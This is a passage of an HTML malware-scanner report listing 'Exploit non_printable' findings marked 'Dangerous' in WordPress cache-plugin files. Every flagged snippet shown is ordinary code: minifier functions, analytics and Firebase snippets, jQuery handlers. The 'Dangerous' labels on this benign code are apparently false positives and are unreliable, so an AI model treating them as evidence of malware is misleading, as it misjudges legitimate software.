</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 165</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_type_attribute_for_js</span><span style="color: #007700">(</span><span style="color: #0000BB">$script</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$script</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eliminate_newline</span><span style="color: #007700">(</span><span style="color: #0000BB">$start_string</span><span style="color: #007700">, </span><span style="color: #0000BB">$end_string</span><span style="color: #007700">, </span><span style="color: #0000BB">$tmp_html</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_html</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 227</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$tmp_html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_single_line_comments</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_html_comments</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_body_html</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_line_css</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$source</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">minify_css</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_head_html</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eliminate_newline_for_css</span><span style="color: #007700">(</span><span style="color: #0000BB">$matches</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 370</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$matches</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">].</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">minify_inline_css</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_blocking</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$render_blocking_css </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_head_comments</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$render</span><span style="color: #007700">-></span><span style="color: #0000BB">action</span><span style="color: #007700">(</span><span style="color: #0000BB">$render_blocking_css</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">google_fonts</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lazy_load</span><span style="color: #007700">(</span><span style="color: #0000BB">$content</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 463</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_line_js</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">minify_js</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">, </span><span style="color: #0000BB">$inline_js </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 481</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">i</span><span style="color: #007700">,</span><span style="color: #0000BB">s</span><span style="color: #007700">,</span><span style="color: #0000BB">o</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #0000BB">r</span><span style="color: #007700">,</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">m</span><span style="color: #007700">){</span><span style="color: #0000BB">i</span><span style="color: #007700">[</span><span style="color: #DD0000">'GoogleAnalyticsObject'</span><span style="color: #007700">]=</span><span style="color: #0000BB">r</span><span style="color: #007700">;</span><span style="color: #0000BB">i</span><span style="color: #007700">[</span><span style="color: #0000BB">r</span><span style="color: #007700">]=</span><span style="color: #0000BB">i</span><span style="color: #007700">[</span><span style="color: #0000BB">r</span><span style="color: #007700">]||function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function\(</span><span style="color: #0000BB">i</span><span style="color: #007700">,</span><span style="color: #0000BB">s</span><span style="color: #007700">,</span><span style="color: #0000BB">o</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #0000BB">r</span><span style="color: #007700">,</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">m</span><span style="color: #007700">\)\{</span><span style="color: #0000BB">i</span><span style="color: #007700">\[\</span><span style="color: #DD0000">'GoogleAnalyticsObject\'\]/i", $source)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 520</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">""</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 587</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fix_js_multi_comment_mistakes</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_multi_line_comments_from_js</span><span style="color: #007700">(</span><span style="color: #0000BB">$matches</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 622</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function\(/</span><span style="color: #DD0000">", </span><span style="color: #0000BB">$matches</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]</span><span style="color: #DD0000">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 650</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){return</span><span style="color: #DD0000">"/*# sourceURL="</span><span style="color: #007700">.</span><span style="color: #0000BB">concat</span><span style="color: #007700">(</span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">sourceRoot</span><span style="color: #007700">).</span><span style="color: #0000BB">concat</span><span style="color: #007700">(</span><span style="color: #0000BB">e</span><span style="color: #007700">,</span><span style="color: #DD0000">" */"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 668</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_single_line_comments_from_js</span><span style="color: #007700">(</span><span style="color: #0000BB">$matches</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 78</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"ini_set"</span><span style="color: #007700">) && </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"ini_get"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 94</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">minify_html</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Uc</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">){var </span><span style="color: #0000BB">c</span><span style="color: #007700">=</span><span style="color: #0000BB">Q</span><span style="color: #007700">&&</span><span style="color: #0000BB">Q</span><span style="color: #007700">.</span><span style="color: #0000BB">isAvailable</span><span style="color: #007700">(),</span><span style="color: #0000BB">d</span><span style="color: #007700">=</span><span style="color: #0000BB">c</span><span style="color: #007700">&&!(</span><span style="color: #0000BB">nb</span><span style="color: #007700">.</span><span style="color: #0000BB">kd</span><span style="color: #007700">||!</span><span style="color: #0000BB">0</span><span style="color: #007700">===</span><span style="color: #0000BB">nb</span><span style="color: #007700">.</span><span style="color: #0000BB">get</span><span style="color: #007700">(</span><span style="color: #DD0000">"previous_websocket_failure"</span><span style="color: #007700">));</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ce</span><span style="color: #007700">&&(</span><span style="color: #0000BB">c</span><span style="color: #007700">||</span><span style="color: #0000BB">L</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 961</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">){</span><span style="color: #0000BB">b</span><span style="color: #007700">&&</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">isAvailable</span><span style="color: #007700">()&&</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">b</span><span style="color: #007700">)})}}function </span><span style="color: #0000BB">Wc</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">){if(</span><span style="color: #0000BB">0</span><span style="color: #007700"><</span><span style="color: #0000BB">a</span><span style="color: #007700">.</span><span style="color: #0000BB">Mb</span><span style="color: #007700">.</span><span style="color: #0000BB">length</span><span style="color: #007700">)return </span><span style="color: #0000BB">a</span><span style="color: #007700">.</span><span style="color: #0000BB">Mb</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">];throw </span><span style="color: #0000BB">Error</span><span style="color: #007700">(</span><span style="color: #DD0000">"No transports available"</span><span style="color: #007700">);};function </span><span style="color: #0000BB">Xc</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">c</span><span style="color: #007700">,</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">e</span><span style="color: #007700">,</span><span style="color: #0000BB">f</span><span style="color: #007700">){</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">=</span><span style="color: #0000BB">a</span><span style="color: #007700">;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">e</span><span style="color: #007700">=</span><span style="color: #0000BB">Mb</span><span style="color: #007700">(</span><span style="color: #DD0000">"c:"</span><span style="color: #007700">+</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">+</span><span style="color: #DD0000">":"</span><span style="color: #007700">);</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">Lc</span><span style="color: #007700">=</span><span style="color: #0000BB">c</span><span style="color: #007700">;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">Ab</span><span style="color: #007700">=</span><span style="color: #0000BB">d</span><span style="color: #007700">;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">S</span><span style="color: #007700">=</span><span style="color: #0000BB">e</span><span style="color: #007700">;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">Kc</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">M</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">fc</span><span style="color: #007700">=[];</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">Zc</span><span style="color: #007700">=</span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 963</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function/</span><span style="color: #DD0000">", </span><span style="color: #0000BB">$matches</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]</span><span style="color: #DD0000">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 976</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/\/\/[^\<]+<\/script>/"</span><span style="color: #007700">, </span><span style="color: #DD0000">"</script>"</span><span style="color: #007700">, </span><span style="color: #0000BB">$matches</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">minify_inline_js</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_512").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/logs.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.43 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 39</span><br><table id="file_513" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">.</span><span style="color: #0000BB">id </span><span style="color: #007700">== </span><span style="color: #DD0000">"show-delete-log"</span><span style="color: #007700">){ </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">).</span><span style="color: #0000BB">hide</span><span style="color: #007700">(); </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#hide-delete-log"</span><span style="color: #007700">).</span><span style="color: #0000BB">show</span><span style="color: #007700">(); </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#delete-logs"</span><span style="color: #007700">).</span><span style="color: #0000BB">show</span><span style="color: #007700">(); </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"div.tab2 